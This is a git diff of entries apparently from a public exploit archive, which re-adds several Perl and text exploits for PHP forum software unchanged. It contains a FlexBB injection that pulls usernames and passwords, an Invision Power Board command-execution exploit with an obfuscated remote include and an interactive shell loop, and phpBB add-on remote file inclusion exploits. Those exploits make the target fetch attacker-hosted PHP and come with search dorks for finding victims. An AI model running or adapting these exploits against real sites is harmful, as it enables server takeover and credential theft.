+#                                The Host Name Without http:// | exm. www.vic.com
+#
+#        $path                :-
+#                                FlexBB Dir On Server | exm. /flexbb/
+#
+#        $mycookie             :-
+#                                Your Login Info To Forum *  Not The Real Password || The Hashed One *
+
+
+$sock = IO::Socket::INET->new (
+                                                                                PeerAddr => "$host",
+                                                                                PeerPort => "80",
+                                                                                Proto    => "tcp"
+                                                                                ) or die("[!] Connect To Server Was Filed");
+
+##-- DONT TRY TO EDIT ME --##
+$evildata  = "GET ".$path."index.php?page=showprofile&id=".$injec." HTTP/1.1\n";
+$evildata .= "Host: $host \n";
+$evildata .= "Accept: */* \n";
+$evildata .= "Keep-Alive: 300\n";
+$evildata .= "Connection: keep-alive \n\n";
+
+print $sock $evildata;
+
+while($ans = <$sock>){
+       $usr_newans = $ans;
+       $pwd_newans = $ans;
+       #print $newans;
+       $usr_newans =~ m/<title>FlexBB - Viewing Profile: (.*?)<\/title>/ && print "[+] Username is :- ".$1."\n";
+       $pwd_newans =~ m/<a href="2" target="_blank">(.*?)<\/a>/ && print "[+] Password is :- ".$1."\n";
+}
+
+# milw0rm.com [2006-04-24]
diff --git a/platforms/php/webapps/1720.pl b/platforms/php/webapps/1720.pl
index 6ea34ee7a..84b278d14 100755
--- a/platforms/php/webapps/1720.pl
+++ b/platforms/php/webapps/1720.pl
@@ -1,194 +1,194 @@
-#!/usr/bin/perl
-
-## Invision Power Board 2.* commands execution exploit by RST/GHC
-## vulnerable versions <= 2.1.5
-## tested on 2.1.4, 2.0.2
-##
-## (c)oded by 1dt.w0lf
-## RST/GHC
-## http://rst.void.ru
-## http://ghc.ru
-
-
-use IO::Socket;
-use Getopt::Std;
-
-getopts("l:h:p:d:f:v:");
-
-$host     = $opt_h;
-$dir      = $opt_d;
-$login    = $opt_l;
-$password = $opt_p;
-$forum    = $opt_f;
-$version  = $opt_v || 0;
-
-$|++;
-
-header();
-if(!$host||!$dir||!$login||!$password||!$forum) { usage(); }
-
-print "[~]    SERVER : $host\r\n";
-print "[~]      PATH : $dir\r\n";
-print "[~]     LOGIN : $login\r\n";
-print "[~]  PASSWORD : $password\r\n";
-print "[~]    TARGET : $version";
-print (($version)?(' - IPB 2.1.*'):(' - IPB 2.0.*'));
-print "\r\n";
-
-print "[~] Login ... ";
-
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-$login    =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
-$password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
-$post     = 'UserName='.$login.'&PassWord='.$password;
-$loggedin = 0;
-print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1\r\n";
-print $sock "Host: $host\r\n";
-print $sock "Connection: close\r\n";
-print $sock "Content-Type: application/x-www-form-urlencoded\n";
-print $sock "Content-length: ".length($post)."\r\n\r\n";
-print $sock "$post";
-print $sock "\r\n\r\n";
-while (<$sock>)
-{  
- if(/session_id=([a-f|0-9]{32})/) { $sid = $1; }
-}
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-print $sock "GET ${dir}index.php HTTP/1.1\r\n";
-print $sock "Host: $host\r\n";
-print $sock "Cookie: session_id=$sid;\r\n";
-print $sock "Connection: close\r\n\r\n";
-while (<$sock>)
-{    
- if(/act=Login&CODE=03/) { $loggedin = 1; last; }
-}
-if($loggedin) { print " [ DONE ]\r\n"; }
-else { print " [ FAILED ]\r\n"; exit(); }
-
-print "[+] SID: $sid\r\n";
-
-print "[~] Try get md5_check ...";
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-if($version==1)
- {
- print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1\r\n";
- }
-else
- {
- print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\r\n";
- }
-print $sock "Host: $host\r\n";
-print $sock "Cookie: session_id=$sid;\r\n";
-print $sock "Connection: close\r\n\r\n";
-while (<$sock>)
- {  
- if($version == 1 && /ipb_md5_check\s*= \"([a-f|0-9]{32})\"/)  { $md5_check = $1; last; }
- if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; }
- }
-close($sock);
-if($md5_check) { print " [ DONE ]\r\n"; print "[+] MD5_CHECK : $md5_check\r\n"; }
-else { print " [ FAILED ]\r\n"; exit(); }
-
-print "[~] Create new message ...";
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-$created = 0;
-$text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53)'.
-        '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).chr(120).chr(116))); //';
-$post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeattachid=0&CODE=01&post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_question=&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid=0";
-print $sock "POST ${dir}index.php HTTP/1.1\r\n";
-print $sock "Host: $host\r\n";
-print $sock "Cookie: session_id=$sid;\r\n";
-print $sock "Connection: close\r\n";
-print $sock "Content-Type: application/x-www-form-urlencoded\n";
-print $sock "Content-length: ".length($post)."\r\n\r\n";
-print $sock "$post";
-print $sock "\r\n\r\n";
-while (<$sock>)
- {  
- if(/Location:/) { $created = 1; last; }
- }
-if($created) { print " [ DONE ]\r\n"; }
-else { print " [ FAILED ]\r\n"; exit(); }
-
-$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-print "[~] Search message ...";
-$post = 'keywords=r57ipbxplhohohoeval&namesearch='.$login.'&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=posts';
-print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1\r\n";
-print $sock "Host: $host\r\n";
-print $sock "Cookie: session_id=$sid;\r\n";
-print $sock "Connection: close\r\n";
-print $sock "Content-Type: application/x-www-form-urlencoded\n";
-print $sock "Content-length: ".length($post)."\r\n\r\n";
-print $sock "$post";
-print $sock "\r\n\r\n";
-
-while (<$sock>)
- {
- if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; }
- }
-
-if($searchid) { print " [ DONE ]\r\n"; }
-else { print "[ FAILED ]\r\n"; exit(); }
-print "[+] SEARCHID: $searchid\r\n";
-
-$get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=posts&result_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00';
-
-while ()
- {
-    print "Command for execute or 'exit' for exit # ";
-    while(<STDIN>)
-     {
-        $cmd=$_;
-        chomp($cmd);
-        exit() if ($cmd eq 'exit');
-        last;
-     }
-    &run($cmd);
- }
-
-sub run()
- {
-  $cmd =~ s/(.*);$/$1/eg;
-  $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
-  $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26%20';
-  $cmd2 .= $cmd;
-  $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F';
-  $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
-  
-  print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1\r\n";
-  print $sock "Host: $host\r\n";
-  print $sock "Cookie: session_id=$sid;\r\n";
-  print $sock "Connection: close\r\n\r\n";
-
-  $on = 0;
-  $runned = 0;
-  while ($answer = <$sock>)
-   {
-    if ($answer =~ /^_END_/) { return 0; }
-    if ($on == 1) { print "  $answer"; }
-    if ($answer =~ /^_START_/) { $on = 1; }
-   }
- }
- 
-sub header()
- {
- print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";   
- print " Invision Power Board 2.* commands execution exploit by RST/GHC\r\n";
- print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
- }
- 
-sub usage()
- {
- print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> -v <version>\r\n\r\n";
- print "<host>     - host where IPB installed e.g www.ipb.com\r\n";
- print "<dir>      - folder where IPB installed e.g. /forum/ , /ipb/ , etc...\r\n";
- print "<login>    - login of any exist user\r\n";
- print "<password> - and password too )\r\n";
- print "<forum>    - number of forum where user can create topic e.g 2,4, etc\r\n";
- print "<version>  - forum version:\r\n";
- print "             0 - 2.0.*\r\n";
- print "             1 - 2.1.*\r\n";
- exit();
- }
-
-# milw0rm.com [2006-04-26]
+#!/usr/bin/perl
+
+## Invision Power Board 2.* commands execution exploit by RST/GHC
+## vulnerable versions <= 2.1.5
+## tested on 2.1.4, 2.0.2
+##
+## (c)oded by 1dt.w0lf
+## RST/GHC
+## http://rst.void.ru
+## http://ghc.ru
+
+
+use IO::Socket;
+use Getopt::Std;
+
+getopts("l:h:p:d:f:v:");
+
+$host     = $opt_h;
+$dir      = $opt_d;
+$login    = $opt_l;
+$password = $opt_p;
+$forum    = $opt_f;
+$version  = $opt_v || 0;
+
+$|++;
+
+header();
+if(!$host||!$dir||!$login||!$password||!$forum) { usage(); }
+
+print "[~]    SERVER : $host\r\n";
+print "[~]      PATH : $dir\r\n";
+print "[~]     LOGIN : $login\r\n";
+print "[~]  PASSWORD : $password\r\n";
+print "[~]    TARGET : $version";
+print (($version)?(' - IPB 2.1.*'):(' - IPB 2.0.*'));
+print "\r\n";
+
+print "[~] Login ... ";
+
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+$login    =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
+$password =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
+$post     = 'UserName='.$login.'&PassWord='.$password;
+$loggedin = 0;
+print $sock "POST ${dir}index.php?act=Login&CODE=01 HTTP/1.1\r\n";
+print $sock "Host: $host\r\n";
+print $sock "Connection: close\r\n";
+print $sock "Content-Type: application/x-www-form-urlencoded\n";
+print $sock "Content-length: ".length($post)."\r\n\r\n";
+print $sock "$post";
+print $sock "\r\n\r\n";
+while (<$sock>)
+{  
+ if(/session_id=([a-f|0-9]{32})/) { $sid = $1; }
+}
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+print $sock "GET ${dir}index.php HTTP/1.1\r\n";
+print $sock "Host: $host\r\n";
+print $sock "Cookie: session_id=$sid;\r\n";
+print $sock "Connection: close\r\n\r\n";
+while (<$sock>)
+{    
+ if(/act=Login&CODE=03/) { $loggedin = 1; last; }
+}
+if($loggedin) { print " [ DONE ]\r\n"; }
+else { print " [ FAILED ]\r\n"; exit(); }
+
+print "[+] SID: $sid\r\n";
+
+print "[~] Try get md5_check ...";
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+if($version==1)
+ {
+ print $sock "GET ${dir}index.php?act=post&do=new_post&f=${forum} HTTP/1.1\r\n";
+ }
+else
+ {
+ print $sock "GET ${dir}index.php?act=Post&CODE=00&f=${forum} HTTP/1.1\r\n";
+ }
+print $sock "Host: $host\r\n";
+print $sock "Cookie: session_id=$sid;\r\n";
+print $sock "Connection: close\r\n\r\n";
+while (<$sock>)
+ {  
+ if($version == 1 && /ipb_md5_check\s*= \"([a-f|0-9]{32})\"/)  { $md5_check = $1; last; }
+ if($version == 0 && /auth_key' value='([a-f|0-9]{32})/) { $md5_check = $1; last; }
+ }
+close($sock);
+if($md5_check) { print " [ DONE ]\r\n"; print "[+] MD5_CHECK : $md5_check\r\n"; }
+else { print " [ FAILED ]\r\n"; exit(); }
+
+print "[~] Create new message ...";
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+$created = 0;
+$text = 'r57ipbxplhohohoeval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(114).chr(115).chr(116).chr(46).chr(118).chr(111).chr(105).chr(100).chr(46).chr(114).chr(117).chr(47).chr(114).chr(53)'.
+        '.chr(55).chr(105).chr(112).chr(98).chr(105).chr(110).chr(99).chr(46).chr(116).chr(120).chr(116))); //';
+$post = "st=0&act=Post&s=&f=${forum}&auth_key=${md5_check}&removeattachid=0&CODE=01&post_key=&TopicTitle=justxpl&TopicDesc=justxpl&poll_question=&ffont=0&fsize=0&Post=${text}&enableemo=yes&enablesig=yes&iconid=0";
+print $sock "POST ${dir}index.php HTTP/1.1\r\n";
+print $sock "Host: $host\r\n";
+print $sock "Cookie: session_id=$sid;\r\n";
+print $sock "Connection: close\r\n";
+print $sock "Content-Type: application/x-www-form-urlencoded\n";
+print $sock "Content-length: ".length($post)."\r\n\r\n";
+print $sock "$post";
+print $sock "\r\n\r\n";
+while (<$sock>)
+ {  
+ if(/Location:/) { $created = 1; last; }
+ }
+if($created) { print " [ DONE ]\r\n"; }
+else { print " [ FAILED ]\r\n"; exit(); }
+
+$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+print "[~] Search message ...";
+$post = 'keywords=r57ipbxplhohohoeval&namesearch='.$login.'&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=posts';
+print $sock "POST ${dir}index.php?act=Search&CODE=01 HTTP/1.1\r\n";
+print $sock "Host: $host\r\n";
+print $sock "Cookie: session_id=$sid;\r\n";
+print $sock "Connection: close\r\n";
+print $sock "Content-Type: application/x-www-form-urlencoded\n";
+print $sock "Content-length: ".length($post)."\r\n\r\n";
+print $sock "$post";
+print $sock "\r\n\r\n";
+
+while (<$sock>)
+ {
+ if(/searchid=([a-f|0-9]{32})/) { $searchid = $1; last; }
+ }
+
+if($searchid) { print " [ DONE ]\r\n"; }
+else { print "[ FAILED ]\r\n"; exit(); }
+print "[+] SEARCHID: $searchid\r\n";
+
+$get = 'index.php?act=Search&CODE=show&searchid='.$searchid.'&search_in=posts&result_type=posts&highlite=r57ipbxplhohohoeval&lastdate=z|eval.*?%20//)%23e%00';
+
+while ()
+ {
+    print "Command for execute or 'exit' for exit # ";
+    while(<STDIN>)
+     {
+        $cmd=$_;
+        chomp($cmd);
+        exit() if ($cmd eq 'exit');
+        last;
+     }
+    &run($cmd);
+ }
+
+sub run()
+ {
+  $cmd =~ s/(.*);$/$1/eg;
+  $cmd =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
+  $cmd2 = '%65%63%68%6F%20%5F%53%54%41%52%54%5F%20%26%26%20';
+  $cmd2 .= $cmd;
+  $cmd2 .= '%20%26%26%20%65%63%68%6F%20%5F%45%4E%44%5F';
+  $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-] CONNECTION FAILED";
+  
+  print $sock "GET ${dir}${get}&eharniy_ekibastos=$cmd2 HTTP/1.1\r\n";
+  print $sock "Host: $host\r\n";
+  print $sock "Cookie: session_id=$sid;\r\n";
+  print $sock "Connection: close\r\n\r\n";
+
+  $on = 0;
+  $runned = 0;
+  while ($answer = <$sock>)
+   {
+    if ($answer =~ /^_END_/) { return 0; }
+    if ($on == 1) { print "  $answer"; }
+    if ($answer =~ /^_START_/) { $on = 1; }
+   }
+ }
+ 
+sub header()
+ {
+ print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";   
+ print " Invision Power Board 2.* commands execution exploit by RST/GHC\r\n";
+ print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n";
+ }
+ 
+sub usage()
+ {
+ print "r57ipbce.pl -h <host> -d <dir> -l <login> -p <password> -f <forum> -v <version>\r\n\r\n";
+ print "<host>     - host where IPB installed e.g www.ipb.com\r\n";
+ print "<dir>      - folder where IPB installed e.g. /forum/ , /ipb/ , etc...\r\n";
+ print "<login>    - login of any exist user\r\n";
+ print "<password> - and password too )\r\n";
+ print "<forum>    - number of forum where user can create topic e.g 2,4, etc\r\n";
+ print "<version>  - forum version:\r\n";
+ print "             0 - 2.0.*\r\n";
+ print "             1 - 2.1.*\r\n";
+ exit();
+ }
+
+# milw0rm.com [2006-04-26]
diff --git a/platforms/php/webapps/1722.txt b/platforms/php/webapps/1722.txt
index cd8ab282c..ccf551b5f 100755
--- a/platforms/php/webapps/1722.txt
+++ b/platforms/php/webapps/1722.txt
@@ -1,8 +1,8 @@
-Title: TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
-URL: http://www.phpbb2hacks.de/toplist-df148.html
-Dork: inurl:"toplist.php" "powered by phpbb"
-Credits: [Oo]
-
-Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls
-
-# milw0rm.com [2006-04-27]
+Title: TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
+URL: http://www.phpbb2hacks.de/toplist-df148.html
+Dork: inurl:"toplist.php" "powered by phpbb"
+Credits: [Oo]
+
+Exploit: /toplist.php?f=toplist_top10&phpbb_root_path=http://yourhost/cmd.gif?cmd=ls
+
+# milw0rm.com [2006-04-27]
diff --git a/platforms/php/webapps/1723.txt b/platforms/php/webapps/1723.txt
index b7ac87006..5eecfb117 100755
--- a/platforms/php/webapps/1723.txt
+++ b/platforms/php/webapps/1723.txt
@@ -1,7 +1,7 @@
-Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion
-Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
-Credits: [Oo]
-
-Exploit: http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?
-
-# milw0rm.com [2006-04-28]
+Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion
+Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
+Credits: [Oo]
+
+Exploit: http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?
+
+# milw0rm.com [2006-04-28]
diff --git a/platforms/php/webapps/1724.pl b/platforms/php/webapps/1724.pl
index 513f5fa30..b05798b6c 100755
--- a/platforms/php/webapps/1724.pl
+++ b/platforms/php/webapps/1724.pl
@@ -1,63 +1,63 @@
-# TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
-# Based on http://milw0rm.com/exploits/1722
-# Bug found by : [Oo]
-#
-# No more uploading php shells !!! 
-# This is my way of php include exploitation !!!
-# Learn to play with sockets !!!
-# FOX_MULDER (fox_mulder@abv.bg)
-
-#!/usr/bin/perl
-  use LWP 5.64;
-  use IO::Socket;
-  use LWP::Simple;
-
-(my $hostname, my $target, my $dir,my $command) = @ARGV;
-
-if(@ARGV < 4) {
-print "=======================================================================+\n";
-print "TopList REMOTE COMMAND EXECUTION EXPLOIT by fox_mulder\@abv.bg         |\n";
-print "Usage: top.pl yourIP target /dir/ \"command\"                            |\n";
-print "Example: top.pl 10.20.30.40 www.microsoft.com /forum/ \"uname -a\"     |\n";
-print "=======================================================================+\n";
-exit;
-}
-print "[+]Creating listening socket . . .\n";
-my $sock = new IO::Socket::INET (
-                                  LocalHost => "$hostname",
-                                  LocalPort => '9999',
-                                  Proto => 'tcp',
-                                  Listen => 1,
-                                  Reuse => 1,
-                                 );
- die "Could not create socket: $!\n" unless $sock;
-
-        if (my $pid = fork){
-        my $new_sock = $sock->accept();
-                my $request = <$new_sock>;
-                print $new_sock "HTTP/1.1 200 OK\n";
-                print $new_sock "Content-Length: $content_length\n";
-                print $new_sock "Content-Type: text/plain\n\n";
-                print $new_sock "<? error_reporting(0);passthru(\"$command\"); ?>\n";
-                close $new_sock;
-                exit;
-        }
-print "[+]Injecting  command . . .\n";
-
-my $browser = LWP::UserAgent->new;
-   $browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
-
-  my $url = "http://$target/$dir/toplist.php";
-  my $response = $browser->post( $url,
-    [
-	'f'            => "toplist_top10",
-        'phpbb_root_path' => "http://$hostname:9999/blah.php"
-]
-  );
-
-  die "Received invalid response type", $response->content_type
-   unless $response->content_type eq 'text/html';
-
-        print $response->content;
-
-# milw0rm.com [2006-04-28]
+# TopList Hack for PHPBB <= 1.3.8 Remote File Inclusion
+# Based on http://milw0rm.com/exploits/1722
+# Bug found by : [Oo]
+#
+# No more uploading php shells !!! 
+# This is my way of php include exploitation !!!
+# Learn to play with sockets !!!
+# FOX_MULDER (fox_mulder@abv.bg)
+
+#!/usr/bin/perl
+  use LWP 5.64;
+  use IO::Socket;
+  use LWP::Simple;
+
+(my $hostname, my $target, my $dir,my $command) = @ARGV;
+
+if(@ARGV < 4) {
+print "=======================================================================+\n";
+print "TopList REMOTE COMMAND EXECUTION EXPLOIT by fox_mulder\@abv.bg         |\n";
+print "Usage: top.pl yourIP target /dir/ \"command\"                            |\n";
+print "Example: top.pl 10.20.30.40 www.microsoft.com /forum/ \"uname -a\"     |\n";
+print "=======================================================================+\n";
+exit;
+}
+print "[+]Creating listening socket . . .\n";
+my $sock = new IO::Socket::INET (
+                                  LocalHost => "$hostname",
+                                  LocalPort => '9999',
+                                  Proto => 'tcp',
+                                  Listen => 1,
+                                  Reuse => 1,
+                                 );
+ die "Could not create socket: $!\n" unless $sock;
+
+        if (my $pid = fork){
+        my $new_sock = $sock->accept();
+                my $request = <$new_sock>;
+                print $new_sock "HTTP/1.1 200 OK\n";
+                print $new_sock "Content-Length: $content_length\n";
+                print $new_sock "Content-Type: text/plain\n\n";
+                print $new_sock "<? error_reporting(0);passthru(\"$command\"); ?>\n";
+                close $new_sock;
+                exit;
+        }
+print "[+]Injecting  command . . .\n";
+
+my $browser = LWP::UserAgent->new;
+   $browser->agent('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
+
+  my $url = "http://$target/$dir/toplist.php";
+  my $response = $browser->post( $url,
+    [
+	'f'            => "toplist_top10",
+        'phpbb_root_path' => "http://$hostname:9999/blah.php"
+]
+  );
+
+  die "Received invalid response type", $response->content_type
+   unless $response->content_type eq 'text/html';
+
+        print $response->content;
+
+# milw0rm.com [2006-04-28]
diff --git a/platforms/php/webapps/1725.pl b/platforms/php/webapps/1725.pl
index a7ae82e04..c70d4b4cd 100755
--- a/platforms/php/webapps/1725.pl
+++ b/platforms/php/webapps/1725.pl
@@ -1,58 +1,58 @@
-#!usr/bin/perl
-use LWP::UserAgent;
-# Bug Found by [Oo]
-# Exploit coded by n0m3rcy
-# Copyright (c) 2006 n0m3rcy@bsdmail.org
-# Gr33tz; nukedx , Devil-00 , str0ke , cijfer
-# Usage; n0ag.pl <target> <cmd shell location> <cmd shell variable>
-if (@ARGV ne 3) { &usage; }
-else { &exploit; }
-sub header() {
-print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
-print "+    Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion Exploit      +\r\n";
-print "+                             Bug found by [Oo]                               +\r\n";
-print "+                     Copyright (c) 2006 n0m3rcy@bsdmail.org                  +\r\n";
-print "+                  Gr33tz: nukedx , cijfer , str0ke , Devil-00                +\r\n";
-print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
-}
-sub usage() {
-  &header;
-  print "- Usage: $0 <target> <cmd shell location> <cmd shell variable>\r\n";
-  print "- <target> -> Victim's target ex: www.victim.com/path/\r\n";
-  print "- <cmd shell location> -> www.milw0rm.com/shelltxt\r\n";
-  print "- <cmd shell variable> -> cmd\r\n";
-  exit();
-}
-sub exploit () {
-my $tar = $ARGV[0];
-my $cmdt = $ARGV[1];
-my $cmdv = $ARGV[2];
-while() {
-print "[CMD] \$";
-while(<STDIN>) {
-$cmd=$_;
-chomp($cmd);
-my $exp = LWP::UserAgent->new() or die;
-my $go = HTTP::Request->new(GET =>$tar.' admin/addentry.php?phpbb_root_path='.$cmdt.'?&'.$cmdv.'='.$cmd)or die "\r\n[-] Connected fail\n";
-my $rgo = $exp->request($go);
-my $return = $rgo->content;
-my $return =~ tr/[\n]/[ê]/;
-if (!$cmd) { print "\nPlease Enter a Command\n\n"; $return =""; }
-elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
-       { print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit }
-elsif ($return =~/^<br.\/>.<b>Fatal.error/) { print "\nInvalid Command or No Return\n\n" }
-if ($return =~ /(.*)/) {
-my $finreturn = $1;
-my $finreturn=~ tr/[ê]/[\n]/;
-print "\r\n$finreturn\n\r";
-print "[+] Exploit successed\r\n";
-last;
-}
-else { print "[CMD] \$"; } 
-last;
-}
-exit;
-}
-}
-
-# milw0rm.com [2006-04-28]
+#!usr/bin/perl
+use LWP::UserAgent;
+# Bug Found by [Oo]
+# Exploit coded by n0m3rcy
+# Copyright (c) 2006 n0m3rcy@bsdmail.org
+# Gr33tz; nukedx , Devil-00 , str0ke , cijfer
+# Usage; n0ag.pl <target> <cmd shell location> <cmd shell variable>
+if (@ARGV ne 3) { &usage; }
+else { &exploit; }
+sub header() {
+print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
+print "+    Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion Exploit      +\r\n";
+print "+                             Bug found by [Oo]                               +\r\n";
+print "+                     Copyright (c) 2006 n0m3rcy@bsdmail.org                  +\r\n";
+print "+                  Gr33tz: nukedx , cijfer , str0ke , Devil-00                +\r\n";
+print "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n";
+}
+sub usage() {
+  &header;
+  print "- Usage: $0 <target> <cmd shell location> <cmd shell variable>\r\n";
+  print "- <target> -> Victim's target ex: www.victim.com/path/\r\n";
+  print "- <cmd shell location> -> www.milw0rm.com/shelltxt\r\n";
+  print "- <cmd shell variable> -> cmd\r\n";
+  exit();
+}
+sub exploit () {
+my $tar = $ARGV[0];
+my $cmdt = $ARGV[1];
+my $cmdv = $ARGV[2];
+while() {
+print "[CMD] \$";
+while(<STDIN>) {
+$cmd=$_;
+chomp($cmd);
+my $exp = LWP::UserAgent->new() or die;
+my $go = HTTP::Request->new(GET =>$tar.' admin/addentry.php?phpbb_root_path='.$cmdt.'?&'.$cmdv.'='.$cmd)or die "\r\n[-] Connected fail\n";
+my $rgo = $exp->request($go);
+my $return = $rgo->content;
+my $return =~ tr/[\n]/[ê]/;
+if (!$cmd) { print "\nPlease Enter a Command\n\n"; $return =""; }
+elsif ($return =~/failed to open stream: HTTP request failed!/ || $return =~/: Cannot execute a blank command in <b>/)
+       { print "\nCould Not Connect to cmd Host or Invalid Command Variable\n";exit }
+elsif ($return =~/^<br.\/>.<b>Fatal.error/) { print "\nInvalid Command or No Return\n\n" }
+if ($return =~ /(.*)/) {
+my $finreturn = $1;
+my $finreturn=~ tr/[ê]/[\n]/;
+print "\r\n$finreturn\n\r";
+print "[+] Exploit successed\r\n";
+last;
+}
+else { print "[CMD] \$"; } 
+last;
+}
+exit;
+}
+}
+
+# milw0rm.com [2006-04-28]
diff --git a/platforms/php/webapps/1726.pl b/platforms/php/webapps/1726.pl
index 698d05d88..c0cc6fcac 100755
--- a/platforms/php/webapps/1726.pl
+++ b/platforms/php/webapps/1726.pl
@@ -1,356 +1,356 @@
-#!/usr/bin/perl
-# Wed Apr 26 16:44:15 CEST 2006 jolascoaga@514.es
-#
-# INVISION POWER BOARD 2.1.5 <www.invisionboard.com> pr00f 0f c0ncept
-#
-# remote command execution. vuln credits goes to IceShaman.
-#
-# works only if you have perms to post a comment. Exploit with replye is
-# in my TODO...
-#
-# 514 still r0xing.
-# !dSR the hardc0re hax0rs ;)
-# There is no kwel comments in this release, wait for next upgrade
-#######################################################################/
-
-use LWP::UserAgent;
-use HTTP::Cookies;
-use LWP::Simple;
-use HTTP::Request::Common "POST";
-use HTTP::Response;
-use Getopt::Long;
-use strict;
-
-$| = 1; # ;1 = |$
-
-my ($proxy,$proxy_user,$proxy_pass,$lang);
-my ($arg_host,$debug,$ipb_user,$ipb_pass, $lang, $errors, $topic_index, $tmp_var);
-my ($md5_key, $post_key, $tmp_var);
-
-my %lang_es = (
-       'name' => 'Spanish Language',
-       'login' => "Ahora estás identificado",
-       'incorrect' => "Nombre de usuario o contraseña incorrectos",
-       'deleted' => "Tema Eliminado"
-);
-
-my %lang_en = (
-       'name' => 'English language',
-       'login' =>  "You are now logged in",
-       'incorrect' => "Sorry, we could not find a member using those log in details",
-       'deleted'  => 'Topic Deleted',
-);
-my %lang_strings = ();
-
-my $ua = new LWP::UserAgent(
-           cookie_jar=> { file => "$$.cookie" });
-
-my $options = GetOptions (
- 'host=s'            => \$arg_host,
- 'proxy=s'           => \$proxy,
- 'proxy_user=s'      => \$proxy_user,
- 'proxy_pass=s'      => \$proxy_pass,
- 'ipb_user=s'        => \$ipb_user,
- 'ipb_pass=s'        => \$ipb_pass,
- 'lang=s'            => \$lang,
